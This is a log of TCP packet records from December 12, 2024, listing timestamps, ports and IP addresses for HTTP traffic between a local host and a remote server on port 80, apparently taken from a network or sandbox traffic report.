                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:45.222820997 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:45.222831011 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:45.222861052 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:45.222913980 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:45.222979069 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:45.223823071 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:45.224237919 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:45.224328041 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:45.224807978 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:45.225481987 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:45.225574970 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:45.225855112 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:45.226142883 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:45.226227999 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:45.226840973 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:45.226933002 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:45.227696896 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:45.228040934 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:45.228132963 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:45.228889942 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:45.228965998 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:45.229088068 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:45.229938030 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:45.230021000 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:45.230042934 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:45.230077982 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:45.230954885 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:45.231338024 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:45.231422901 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:45.231933117 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:45.232127905 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:45.232213020 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:45.232928991 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:45.233148098 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:45.233232975 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:45.233949900 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:45.234656096 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:45.234950066 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:45.235049963 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:45.235677958 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:45.235990047 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:45.236082077 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:45.236947060 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:45.237044096 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:45.237056017 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:45.237066984 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:45.237095118 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:45.238070011 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:45.238080978 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:45.238164902 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:45.239029884 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:45.239177942 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:45.239701986 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:45.240041971 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:45.241082907 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:45.241094112 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:45.241106033 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:45.241169930 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:45.241249084 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:45.242050886 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:45.242206097 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:45.242294073 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:45.243119001 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:45.243129969 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:45.243215084 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:45.244095087 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:45.244388103 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:45.245131969 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:45.245217085 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:45.245902061 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:45.246443987 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:45.246454000 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:45.246534109 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:45.246551991 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:45.247158051 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:45.247230053 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:45.247627974 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:45.248158932 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:45.248383045 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:45.248498917 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:45.249208927 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:45.249514103 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:45.249627113 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:45.250164032 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:45.250263929 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:45.251193047 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:45.251281977 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:45.251914978 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:45.252208948 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:45.252322912 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:45.253153086 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:45.253262997 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:45.253271103 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:45.253281116 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:45.253310919 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:45.254672050 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:45.254684925 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:45.254801035 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:45.255248070 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:45.255731106 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:45.256273985 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:45.256361961 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:45.257208109 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:45.257391930 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:45.257402897 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:45.257504940 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:45.257522106 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:45.258311987 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:45.258374929 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:45.258492947 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:45.259355068 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:45.259494066 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:45.259605885 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:45.260328054 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:45.261003017 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:45.261120081 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:45.261375904 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:45.261779070 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:45.262419939 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:45.262432098 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:45.262517929 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:45.407325983 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:45.407692909 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:45.407804012 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:45.407814980 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:45.407918930 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:45.407953978 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:45.408814907 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:45.410006046 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:45.410018921 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:45.410044909 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:45.410125017 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:45.410151005 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:45.410859108 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:45.411525011 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:45.411642075 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:45.411839962 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:45.412951946 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:45.412966967 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:45.413032055 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:45.413054943 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:45.413079023 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:45.413892984 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:45.414423943 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:45.414541960 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:45.414937973 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:45.414949894 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:45.415060997 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:45.415966988 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:45.417018890 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:45.417032003 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:45.417056084 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:45.417256117 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:45.417958021 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:45.418245077 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:45.418342113 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:45.418981075 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:45.418992996 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:45.419074059 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:45.420075893 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:45.421027899 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:45.421041012 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:45.421109915 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:45.421129942 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:45.421145916 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:45.422102928 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:45.422116041 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:45.422226906 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:45.423048973 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:45.423629999 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:45.424022913 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:45.424114943 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:45.425127983 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:45.425141096 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:45.425194025 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:45.425240040 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:45.425251961 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:45.426075935 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:45.426300049 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:45.427166939 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:45.427221060 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:45.427253008 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:45.427305937 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:45.428116083 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:45.429064989 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:45.429167032 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:45.429183006 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:45.429403067 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:45.429487944 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:45.430290937 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:45.430304050 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:45.430419922 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:45.431123972 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:45.431222916 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:45.431320906 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:45.432127953 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:45.433192015 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:45.433207035 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:45.433274031 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:45.433299065 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:45.433326006 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:45.434182882 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:45.435285091 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:45.435297966 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:45.435309887 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:45.435374975 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:45.435389996 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:45.436214924 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:45.437309027 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:45.437323093 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:45.437335014 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:45.437408924 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:45.437446117 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:45.438332081 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:45.438401937 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:45.438561916 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:45.439402103 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:45.439418077 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:45.439529896 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:45.440279961 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:45.441308022 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:45.441322088 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:45.441405058 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:45.441416979 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:45.441437960 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:45.442362070 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:45.442373991 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:45.442486048 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:45.443336964 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:45.444029093 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:45.444336891 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:45.444349051 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:45.444430113 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:45.444451094 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:45.445384979 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:45.445558071 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:45.445673943 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:45.446373940 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:45.446590900 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:45.446696997 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:45.447351933 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:45.447526932 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:45.447702885 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:45.448396921 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:45.448564053 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:45.449497938 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:45.449573994 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:45.449695110 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:45.450448990 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:45.450550079 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:45.451488972 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:45.451500893 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:45.451586008 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:45.451596022 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:45.451623917 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:45.452470064 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:45.453593969 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:45.453608036 CET8049946185.81.68.147192.168.2.10
